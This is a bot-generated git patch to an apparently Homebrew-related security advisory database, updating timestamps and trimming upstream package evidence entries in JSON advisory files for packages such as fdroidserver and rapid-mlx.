From e52ae2404f0ad997097985c8bc6ac0f6d363267b Mon Sep 17 00:00:00 2001 From: BrewTestBot <1589480+BrewTestBot@users.noreply.github.com> Date: Thu, 10 Sep 2026 21:35:41 +0000 Subject: [PATCH] Matched advisory candidates (shard 24) Base: 577c983824b680a1491c3f6b64629943617b82e4 --- .../BREW-fdroidserver-CVE-2008-0299.json | 10 +- .../BREW-fdroidserver-CVE-2010-2480.json | 10 +- .../BREW-fdroidserver-CVE-2010-4340.json | 10 +- .../BREW-fdroidserver-CVE-2012-0805.json | 10 +- .../BREW-fdroidserver-CVE-2012-3446.json | 10 +- .../BREW-fdroidserver-CVE-2013-6480.json | 10 +- .../BREW-fdroidserver-CVE-2014-1829.json | 10 +- .../BREW-fdroidserver-CVE-2014-1830.json | 10 +- .../BREW-fdroidserver-CVE-2014-3146.json | 10 +- .../BREW-fdroidserver-CVE-2014-3429.json | 10 +- .../BREW-fdroidserver-CVE-2015-2296.json | 10 +- .../BREW-fdroidserver-CVE-2015-4706.json | 10 +- .../BREW-fdroidserver-CVE-2015-4707.json | 10 +- .../BREW-fdroidserver-CVE-2015-5607.json | 10 +- .../BREW-fdroidserver-CVE-2015-6938.json | 10 +- .../BREW-fdroidserver-CVE-2015-7337.json | 10 +- .../BREW-fdroidserver-CVE-2015-8557.json | 10 +- .../BREW-fdroidserver-CVE-2016-9015.json | 10 +- .../BREW-fdroidserver-CVE-2017-18342.json | 10 +- .../BREW-fdroidserver-CVE-2018-1000805.json | 10 +- .../BREW-fdroidserver-CVE-2018-18074.json | 10 +- .../BREW-fdroidserver-CVE-2018-19787.json | 10 +- .../BREW-fdroidserver-CVE-2018-20060.json | 10 +- .../BREW-fdroidserver-CVE-2018-25091.json | 10 +- .../BREW-fdroidserver-CVE-2018-7750.json | 10 +- .../BREW-fdroidserver-CVE-2019-11236.json | 10 +- .../BREW-fdroidserver-CVE-2019-11324.json | 10 +- .../BREW-fdroidserver-CVE-2019-18874.json | 10 +- .../BREW-fdroidserver-CVE-2019-20477.json | 10 +- .../BREW-fdroidserver-CVE-2019-7164.json | 10 +- .../BREW-fdroidserver-CVE-2019-7548.json | 10 +- .../BREW-fdroidserver-CVE-2020-14343.json | 10 +- .../BREW-fdroidserver-CVE-2020-1747.json | 10 +- .../BREW-fdroidserver-CVE-2020-26137.json | 10 +- .../BREW-fdroidserver-CVE-2020-27783.json | 10 +- .../BREW-fdroidserver-CVE-2020-7212.json | 10 +- .../BREW-fdroidserver-CVE-2021-20270.json | 10 +- .../BREW-fdroidserver-CVE-2021-27291.json | 10 +- .../BREW-fdroidserver-CVE-2021-28363.json | 10 +- .../BREW-fdroidserver-CVE-2021-28957.json | 10 +- .../BREW-fdroidserver-CVE-2021-33503.json | 10 +- .../BREW-fdroidserver-CVE-2021-43818.json | 10 +- .../BREW-fdroidserver-CVE-2022-0338.json | 10 +- .../BREW-fdroidserver-CVE-2022-21699.json | 10 +- .../BREW-fdroidserver-CVE-2022-2309.json | 10 +- .../BREW-fdroidserver-CVE-2022-24302.json | 10 +- .../BREW-fdroidserver-CVE-2022-24439.json | 10 +- .../BREW-fdroidserver-CVE-2022-40023.json | 10 +- .../BREW-fdroidserver-CVE-2022-40896.json | 10 +- .../BREW-fdroidserver-CVE-2023-24816.json | 10 +- .../BREW-fdroidserver-CVE-2023-32681.json | 10 +- .../BREW-fdroidserver-CVE-2023-40267.json | 10 +- .../BREW-fdroidserver-CVE-2023-40590.json | 10 +- .../BREW-fdroidserver-CVE-2023-41040.json | 10 +- .../BREW-fdroidserver-CVE-2023-43804.json | 10 +- .../BREW-fdroidserver-CVE-2023-45803.json | 10 +- .../BREW-fdroidserver-CVE-2023-48795.json | 10 +- .../BREW-fdroidserver-CVE-2024-22190.json | 10 +- .../BREW-fdroidserver-CVE-2024-35195.json | 10 +- .../BREW-fdroidserver-CVE-2024-3651.json | 10 +- .../BREW-fdroidserver-CVE-2024-37891.json | 10 +- .../BREW-fdroidserver-CVE-2024-47081.json | 10 +- .../BREW-fdroidserver-CVE-2025-50181.json | 10 +- .../BREW-fdroidserver-CVE-2025-50182.json | 10 +- .../BREW-fdroidserver-CVE-2025-66418.json | 10 +- .../BREW-fdroidserver-CVE-2025-66471.json | 10 +- .../BREW-fdroidserver-CVE-2025-69277.json | 10 +- .../BREW-fdroidserver-CVE-2026-21441.json | 10 +- .../BREW-fdroidserver-CVE-2026-25645.json | 10 +- .../BREW-fdroidserver-CVE-2026-41066.json | 10 +- .../BREW-fdroidserver-CVE-2026-41205.json | 10 +- .../BREW-fdroidserver-CVE-2026-42215.json | 10 +- .../BREW-fdroidserver-CVE-2026-42284.json | 10 +- .../BREW-fdroidserver-CVE-2026-44243.json | 10 +- .../BREW-fdroidserver-CVE-2026-44244.json | 10 +- .../BREW-fdroidserver-CVE-2026-44307.json | 10 +- .../BREW-fdroidserver-CVE-2026-44405.json | 10 +- .../BREW-fdroidserver-CVE-2026-44431.json | 10 +- .../BREW-fdroidserver-CVE-2026-44432.json | 10 +- .../BREW-fdroidserver-CVE-2026-4539.json | 10 +- .../BREW-fdroidserver-CVE-2026-45409.json | 10 +- .../BREW-fdroidserver-CVE-2026-67322.json | 13 ++- .../BREW-fdroidserver-CVE-2026-67323.json | 15 ++- .../BREW-fdroidserver-CVE-2026-67324.json | 5 +- .../BREW-fdroidserver-CVE-2026-67325.json | 15 ++- .../BREW-fdroidserver-CVE-2026-73619.json | 5 +- .../BREW-fdroidserver-CVE-2026-73620.json | 5 +- .../BREW-fdroidserver-CVE-2026-73621.json | 5 +- .../BREW-fdroidserver-CVE-2026-73622.json | 5 +- .../BREW-fdroidserver-CVE-2026-73623.json | 5 +- .../BREW-fdroidserver-CVE-2026-73625.json | 5 +- .../BREW-fdroidserver-CVE-2026-76217.json | 13 ++- .../BREW-fdroidserver-CVE-2026-76218.json | 13 ++- .../BREW-fdroidserver-CVE-2026-76219.json | 15 ++- .../BREW-fdroidserver-CVE-2026-76220.json | 13 ++- .../BREW-fdroidserver-CVE-2026-76221.json | 10 +- .../BREW-fdroidserver-CVE-2026-76222.json | 22 +++-- .../BREW-fdroidserver-CVE-2026-78675.json | 41 ++++++-- .../BREW-fdroidserver-CVE-2026-78676.json | 29 ++++-- .../BREW-fdroidserver-CVE-2026-78677.json | 41 ++++++-- .../BREW-fdroidserver-CVE-2026-78678.json | 27 +++-- advisories/BREW-git-annex-CVE-2014-6274.json | 10 +- advisories/BREW-git-annex-CVE-2017-12976.json | 10 +- advisories/BREW-git-annex-CVE-2018-10857.json | 10 +- advisories/BREW-git-annex-CVE-2018-10859.json | 10 +- advisories/BREW-git-annex-HSEC-2023-0012.json | 6 +- advisories/BREW-hf-CVE-2016-10075.json | 10 +- advisories/BREW-hf-CVE-2017-18342.json | 10 +- advisories/BREW-hf-CVE-2019-20477.json | 10 +- advisories/BREW-hf-CVE-2020-14343.json | 10 +- advisories/BREW-hf-CVE-2020-1747.json | 10 +- advisories/BREW-hf-CVE-2021-41945.json | 10 +- advisories/BREW-hf-CVE-2024-34062.json | 10 +- advisories/BREW-hf-CVE-2024-3651.json | 10 +- advisories/BREW-hf-CVE-2025-43859.json | 10 +- advisories/BREW-hf-CVE-2025-68146.json | 10 +- advisories/BREW-hf-CVE-2026-22701.json | 10 +- advisories/BREW-hf-CVE-2026-45409.json | 10 +- advisories/BREW-pulp-cli-CVE-2014-1829.json | 10 +- advisories/BREW-pulp-cli-CVE-2014-1830.json | 10 +- advisories/BREW-pulp-cli-CVE-2015-2296.json | 10 +- advisories/BREW-pulp-cli-CVE-2016-9015.json | 10 +- advisories/BREW-pulp-cli-CVE-2017-18342.json | 10 +- advisories/BREW-pulp-cli-CVE-2018-18074.json | 10 +- advisories/BREW-pulp-cli-CVE-2018-20060.json | 10 +- advisories/BREW-pulp-cli-CVE-2018-25091.json | 10 +- advisories/BREW-pulp-cli-CVE-2019-11236.json | 10 +- advisories/BREW-pulp-cli-CVE-2019-11324.json | 10 +- advisories/BREW-pulp-cli-CVE-2019-20477.json | 10 +- advisories/BREW-pulp-cli-CVE-2020-14343.json | 10 +- advisories/BREW-pulp-cli-CVE-2020-1747.json | 10 +- advisories/BREW-pulp-cli-CVE-2020-26137.json | 10 +- advisories/BREW-pulp-cli-CVE-2020-7212.json | 10 +- advisories/BREW-pulp-cli-CVE-2021-28363.json | 10 +- advisories/BREW-pulp-cli-CVE-2021-33503.json | 10 +- advisories/BREW-pulp-cli-CVE-2023-32681.json | 10 +- advisories/BREW-pulp-cli-CVE-2023-43804.json | 10 +- advisories/BREW-pulp-cli-CVE-2023-45803.json | 10 +- advisories/BREW-pulp-cli-CVE-2024-35195.json | 10 +- advisories/BREW-pulp-cli-CVE-2024-3651.json | 10 +- advisories/BREW-pulp-cli-CVE-2024-37891.json | 10 +- advisories/BREW-pulp-cli-CVE-2024-47081.json | 10 +- advisories/BREW-pulp-cli-CVE-2025-50181.json | 10 +- advisories/BREW-pulp-cli-CVE-2025-50182.json | 10 +- advisories/BREW-pulp-cli-CVE-2025-66418.json | 10 +- advisories/BREW-pulp-cli-CVE-2025-66471.json | 10 +- advisories/BREW-pulp-cli-CVE-2026-21441.json | 10 +- advisories/BREW-pulp-cli-CVE-2026-25645.json | 10 +- advisories/BREW-pulp-cli-CVE-2026-44431.json | 10 +- advisories/BREW-pulp-cli-CVE-2026-44432.json | 10 +- advisories/BREW-pulp-cli-CVE-2026-45409.json | 10 +- advisories/BREW-rapid-mlx-CVE-2014-0012.json | 10 +- advisories/BREW-rapid-mlx-CVE-2014-1402.json | 10 +- advisories/BREW-rapid-mlx-CVE-2014-1829.json | 10 +- advisories/BREW-rapid-mlx-CVE-2014-1830.json | 10 +- advisories/BREW-rapid-mlx-CVE-2015-2296.json | 10 +- advisories/BREW-rapid-mlx-CVE-2015-5237.json | 10 +- advisories/BREW-rapid-mlx-CVE-2015-8557.json | 10 +- advisories/BREW-rapid-mlx-CVE-2016-10075.json | 10 +- advisories/BREW-rapid-mlx-CVE-2016-10745.json | 10 +- advisories/BREW-rapid-mlx-CVE-2016-9015.json | 10 +- advisories/BREW-rapid-mlx-CVE-2017-11424.json | 10 +- advisories/BREW-rapid-mlx-CVE-2017-18342.json | 10 +- .../BREW-rapid-mlx-CVE-2018-1000518.json | 10 +- advisories/BREW-rapid-mlx-CVE-2018-18074.json | 10 +- advisories/BREW-rapid-mlx-CVE-2018-20060.json | 10 +- advisories/BREW-rapid-mlx-CVE-2018-25091.json | 10 +- advisories/BREW-rapid-mlx-CVE-2019-10906.json | 10 +- advisories/BREW-rapid-mlx-CVE-2019-11236.json | 10 +- advisories/BREW-rapid-mlx-CVE-2019-11324.json | 10 +- advisories/BREW-rapid-mlx-CVE-2019-18874.json | 10 +- advisories/BREW-rapid-mlx-CVE-2019-20477.json | 10 +- advisories/BREW-rapid-mlx-CVE-2020-14343.json | 10 +- advisories/BREW-rapid-mlx-CVE-2020-1747.json | 10 +- advisories/BREW-rapid-mlx-CVE-2020-26137.json | 10 +- advisories/BREW-rapid-mlx-CVE-2020-28493.json | 10 +- advisories/BREW-rapid-mlx-CVE-2020-7212.json | 10 +- advisories/BREW-rapid-mlx-CVE-2020-7694.json | 10 +- advisories/BREW-rapid-mlx-CVE-2020-7695.json | 10 +- advisories/BREW-rapid-mlx-CVE-2021-20270.json | 10 +- advisories/BREW-rapid-mlx-CVE-2021-27291.json | 10 +- advisories/BREW-rapid-mlx-CVE-2021-28363.json | 10 +- advisories/BREW-rapid-mlx-CVE-2021-32677.json | 10 +- advisories/BREW-rapid-mlx-CVE-2021-33503.json | 10 +- advisories/BREW-rapid-mlx-CVE-2021-33880.json | 10 +- advisories/BREW-rapid-mlx-CVE-2021-41945.json | 10 +- advisories/BREW-rapid-mlx-CVE-2022-1941.json | 10 +- advisories/BREW-rapid-mlx-CVE-2022-29217.json | 10 +- advisories/BREW-rapid-mlx-CVE-2022-40896.json | 10 +- advisories/BREW-rapid-mlx-CVE-2023-26302.json | 10 +- advisories/BREW-rapid-mlx-CVE-2023-26303.json | 10 +- advisories/BREW-rapid-mlx-CVE-2023-2800.json | 10 +- advisories/BREW-rapid-mlx-CVE-2023-29159.json | 10 +- advisories/BREW-rapid-mlx-CVE-2023-30798.json | 10 +- advisories/BREW-rapid-mlx-CVE-2023-32681.json | 10 +- advisories/BREW-rapid-mlx-CVE-2023-43804.json | 10 +- advisories/BREW-rapid-mlx-CVE-2023-45803.json | 10 +- advisories/BREW-rapid-mlx-CVE-2023-6730.json | 10 +- advisories/BREW-rapid-mlx-CVE-2023-7018.json | 10 +- advisories/BREW-rapid-mlx-CVE-2024-11392.json | 10 +- advisories/BREW-rapid-mlx-CVE-2024-11393.json | 10 +- advisories/BREW-rapid-mlx-CVE-2024-11394.json | 10 +- advisories/BREW-rapid-mlx-CVE-2024-12720.json | 10 +- advisories/BREW-rapid-mlx-CVE-2024-22195.json | 10 +- advisories/BREW-rapid-mlx-CVE-2024-34062.json | 10 +- advisories/BREW-rapid-mlx-CVE-2024-34064.json | 10 +- advisories/BREW-rapid-mlx-CVE-2024-35195.json | 10 +- advisories/BREW-rapid-mlx-CVE-2024-3568.json | 10 +- advisories/BREW-rapid-mlx-CVE-2024-3651.json | 10 +- advisories/BREW-rapid-mlx-CVE-2024-37891.json | 10 +- advisories/BREW-rapid-mlx-CVE-2024-47081.json | 10 +- advisories/BREW-rapid-mlx-CVE-2024-47874.json | 10 +- advisories/BREW-rapid-mlx-CVE-2024-53861.json | 10 +- advisories/BREW-rapid-mlx-CVE-2024-53981.json | 10 +- advisories/BREW-rapid-mlx-CVE-2024-56201.json | 10 +- advisories/BREW-rapid-mlx-CVE-2024-56326.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-1194.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-2099.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-27516.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-3262.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-3263.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-3264.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-3777.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-3933.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-43859.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-4565.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-50181.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-50182.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-5197.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-53365.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-53366.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-54121.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-6051.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-62727.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-6638.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-66416.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-66418.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-66471.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-68146.json | 10 +- advisories/BREW-rapid-mlx-CVE-2025-6921.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-0994.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-1260.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-1839.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-21441.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-22701.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-24486.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-25645.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-32597.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-40347.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-42561.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-4372.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-44431.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-44432.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-4539.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-45409.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-48522.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-48523.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-48524.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-48525.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-48526.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-48710.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-48817.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-48818.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-5241.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-52869.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-52870.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-53537.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-53538.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-53539.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-53540.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-54282.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-54283.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-59950.json | 10 +- advisories/BREW-rapid-mlx-CVE-2026-84378.json | 93 ++++++++++++++++++ advisories/BREW-rapid-mlx-CVE-2026-84379.json | 89 +++++++++++++++++ advisories/BREW-rapid-mlx-CVE-2026-84380.json | 89 +++++++++++++++++ advisories/BREW-rapid-mlx-CVE-2026-84381.json | 98 +++++++++++++++++++ advisories/BREW-rapid-mlx-CVE-2026-84382.json | 89 +++++++++++++++++ .../BREW-slither-analyzer-CVE-2014-1829.json | 10 +- .../BREW-slither-analyzer-CVE-2014-1830.json | 10 +- .../BREW-slither-analyzer-CVE-2015-2296.json | 10 +- .../BREW-slither-analyzer-CVE-2016-9015.json | 10 +- ...REW-slither-analyzer-CVE-2018-1000518.json | 10 +- .../BREW-slither-analyzer-CVE-2018-15560.json | 10 +- .../BREW-slither-analyzer-CVE-2018-18074.json | 10 +- .../BREW-slither-analyzer-CVE-2018-20060.json | 10 +- .../BREW-slither-analyzer-CVE-2018-25091.json | 10 +- .../BREW-slither-analyzer-CVE-2019-11236.json | 10 +- .../BREW-slither-analyzer-CVE-2019-11324.json | 10 +- .../BREW-slither-analyzer-CVE-2020-26137.json | 10 +- .../BREW-slither-analyzer-CVE-2020-7212.json | 10 +- .../BREW-slither-analyzer-CVE-2021-21330.json | 10 +- .../BREW-slither-analyzer-CVE-2021-28363.json | 10 +- .../BREW-slither-analyzer-CVE-2021-33503.json | 10 +- .../BREW-slither-analyzer-CVE-2021-33880.json | 10 +- .../BREW-slither-analyzer-CVE-2022-1930.json | 10 +- .../BREW-slither-analyzer-CVE-2023-32681.json | 10 +- .../BREW-slither-analyzer-CVE-2023-37276.json | 10 +- .../BREW-slither-analyzer-CVE-2023-43804.json | 10 +- .../BREW-slither-analyzer-CVE-2023-45803.json | 10 +- .../BREW-slither-analyzer-CVE-2023-47627.json | 10 +- .../BREW-slither-analyzer-CVE-2023-47641.json | 10 +- .../BREW-slither-analyzer-CVE-2023-49081.json | 10 +- .../BREW-slither-analyzer-CVE-2023-49082.json | 10 +- .../BREW-slither-analyzer-CVE-2023-52323.json | 10 +- .../BREW-slither-analyzer-CVE-2024-23334.json | 10 +- .../BREW-slither-analyzer-CVE-2024-23829.json | 10 +- .../BREW-slither-analyzer-CVE-2024-26134.json | 10 +- .../BREW-slither-analyzer-CVE-2024-27306.json | 10 +- .../BREW-slither-analyzer-CVE-2024-30251.json | 10 +- .../BREW-slither-analyzer-CVE-2024-35195.json | 10 +- .../BREW-slither-analyzer-CVE-2024-3651.json | 10 +- .../BREW-slither-analyzer-CVE-2024-37891.json | 10 +- .../BREW-slither-analyzer-CVE-2024-42367.json | 10 +- .../BREW-slither-analyzer-CVE-2024-47081.json | 10 +- .../BREW-slither-analyzer-CVE-2024-52303.json | 10 +- .../BREW-slither-analyzer-CVE-2024-52304.json | 10 +- .../BREW-slither-analyzer-CVE-2025-50181.json | 10 +- .../BREW-slither-analyzer-CVE-2025-50182.json | 10 +- .../BREW-slither-analyzer-CVE-2025-53643.json | 10 +- .../BREW-slither-analyzer-CVE-2025-64076.json | 10 +- .../BREW-slither-analyzer-CVE-2025-66418.json | 10 +- .../BREW-slither-analyzer-CVE-2025-66471.json | 10 +- .../BREW-slither-analyzer-CVE-2025-68131.json | 10 +- .../BREW-slither-analyzer-CVE-2025-69223.json | 10 +- .../BREW-slither-analyzer-CVE-2025-69224.json | 10 +- .../BREW-slither-analyzer-CVE-2025-69225.json | 10 +- .../BREW-slither-analyzer-CVE-2025-69226.json | 10 +- .../BREW-slither-analyzer-CVE-2025-69227.json | 10 +- .../BREW-slither-analyzer-CVE-2025-69228.json | 10 +- .../BREW-slither-analyzer-CVE-2025-69229.json | 10 +- .../BREW-slither-analyzer-CVE-2025-69230.json | 10 +- .../BREW-slither-analyzer-CVE-2026-21441.json | 10 +- .../BREW-slither-analyzer-CVE-2026-22815.json | 10 +- .../BREW-slither-analyzer-CVE-2026-25645.json | 10 +- .../BREW-slither-analyzer-CVE-2026-26209.json | 10 +- .../BREW-slither-analyzer-CVE-2026-34513.json | 10 +- .../BREW-slither-analyzer-CVE-2026-34514.json | 10 +- .../BREW-slither-analyzer-CVE-2026-34515.json | 10 +- .../BREW-slither-analyzer-CVE-2026-34516.json | 10 +- .../BREW-slither-analyzer-CVE-2026-34517.json | 10 +- .../BREW-slither-analyzer-CVE-2026-34518.json | 10 +- .../BREW-slither-analyzer-CVE-2026-34519.json | 10 +- .../BREW-slither-analyzer-CVE-2026-34520.json | 10 +- .../BREW-slither-analyzer-CVE-2026-34525.json | 10 +- .../BREW-slither-analyzer-CVE-2026-34993.json | 10 +- .../BREW-slither-analyzer-CVE-2026-40072.json | 10 +- .../BREW-slither-analyzer-CVE-2026-44431.json | 10 +- .../BREW-slither-analyzer-CVE-2026-44432.json | 10 +- .../BREW-slither-analyzer-CVE-2026-45409.json | 10 +- .../BREW-slither-analyzer-CVE-2026-47265.json | 10 +- .../BREW-slither-analyzer-CVE-2026-50269.json | 10 +- .../BREW-slither-analyzer-CVE-2026-54273.json | 10 +- .../BREW-slither-analyzer-CVE-2026-54274.json | 10 +- .../BREW-slither-analyzer-CVE-2026-54275.json | 10 +- .../BREW-slither-analyzer-CVE-2026-54276.json | 10 +- .../BREW-slither-analyzer-CVE-2026-54277.json | 10 +- .../BREW-slither-analyzer-CVE-2026-54278.json | 10 +- .../BREW-slither-analyzer-CVE-2026-54279.json | 10 +- .../BREW-slither-analyzer-CVE-2026-54280.json | 10 +- .../BREW-slither-analyzer-CVE-2026-59881.json | 10 +- .../BREW-slither-analyzer-CVE-2026-69243.json | 10 +- .../BREW-slither-analyzer-CVE-2026-69244.json | 10 +- advisories/BREW-vpn-slice-CVE-2023-29483.json | 10 +- 364 files changed, 1043 insertions(+), 3103 deletions(-) create mode 100644 advisories/BREW-rapid-mlx-CVE-2026-84378.json create mode 100644 advisories/BREW-rapid-mlx-CVE-2026-84379.json create mode 100644 advisories/BREW-rapid-mlx-CVE-2026-84380.json create mode 100644 advisories/BREW-rapid-mlx-CVE-2026-84381.json create mode 100644 advisories/BREW-rapid-mlx-CVE-2026-84382.json diff --git a/advisories/BREW-fdroidserver-CVE-2008-0299.json b/advisories/BREW-fdroidserver-CVE-2008-0299.json index f383a2239cf..7a7015ed3fd 100644 --- a/advisories/BREW-fdroidserver-CVE-2008-0299.json +++ b/advisories/BREW-fdroidserver-CVE-2008-0299.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2008-0299", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-wqmm-q65g-2hqr", "CVE-2008-0299", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2010-2480.json b/advisories/BREW-fdroidserver-CVE-2010-2480.json index 9d36131afef..01abbb6865f 100644 --- a/advisories/BREW-fdroidserver-CVE-2010-2480.json +++ b/advisories/BREW-fdroidserver-CVE-2010-2480.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2010-2480", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-7q8x-38mc-p84f", "CVE-2010-2480", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mako", - "subject_version": "1.4.1", - "key": "pkg:pypi/mako@1.4.1", - "resource": "mako" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2010-4340.json b/advisories/BREW-fdroidserver-CVE-2010-4340.json index 995f97a4b60..bee77e72b09 100644 --- a/advisories/BREW-fdroidserver-CVE-2010-4340.json +++ b/advisories/BREW-fdroidserver-CVE-2010-4340.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2010-4340", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:11:34Z", "upstream": [ "GHSA-w3j6-8j34-q43x", "CVE-2010-4340", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "apache-libcloud", - "subject_version": "3.9.1", - "key": "pkg:pypi/apache-libcloud@3.9.1", - "resource": "apache-libcloud" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2012-0805.json b/advisories/BREW-fdroidserver-CVE-2012-0805.json index 8dc3f67466b..93ff4dc2632 100644 --- a/advisories/BREW-fdroidserver-CVE-2012-0805.json +++ b/advisories/BREW-fdroidserver-CVE-2012-0805.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2012-0805", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-hfg2-wf6j-x53p", "CVE-2012-0805", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "sqlalchemy", - "subject_version": "2.0.52", - "key": "pkg:pypi/sqlalchemy@2.0.52", - "resource": "sqlalchemy" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2012-3446.json b/advisories/BREW-fdroidserver-CVE-2012-3446.json index 6d5214693f2..1e29344d745 100644 --- a/advisories/BREW-fdroidserver-CVE-2012-3446.json +++ b/advisories/BREW-fdroidserver-CVE-2012-3446.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2012-3446", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:11:34Z", "upstream": [ "GHSA-prcq-52f8-fp44", "CVE-2012-3446", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "apache-libcloud", - "subject_version": "3.9.1", - "key": "pkg:pypi/apache-libcloud@3.9.1", - "resource": "apache-libcloud" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2013-6480.json b/advisories/BREW-fdroidserver-CVE-2013-6480.json index 973813d9582..6317d2163af 100644 --- a/advisories/BREW-fdroidserver-CVE-2013-6480.json +++ b/advisories/BREW-fdroidserver-CVE-2013-6480.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2013-6480", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:11:34Z", "upstream": [ "GHSA-g892-9h8m-r69r", "CVE-2013-6480", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "apache-libcloud", - "subject_version": "3.9.1", - "key": "pkg:pypi/apache-libcloud@3.9.1", - "resource": "apache-libcloud" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2014-1829.json b/advisories/BREW-fdroidserver-CVE-2014-1829.json index 46801111752..38c20b8e263 100644 --- a/advisories/BREW-fdroidserver-CVE-2014-1829.json +++ b/advisories/BREW-fdroidserver-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2014-1829", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": 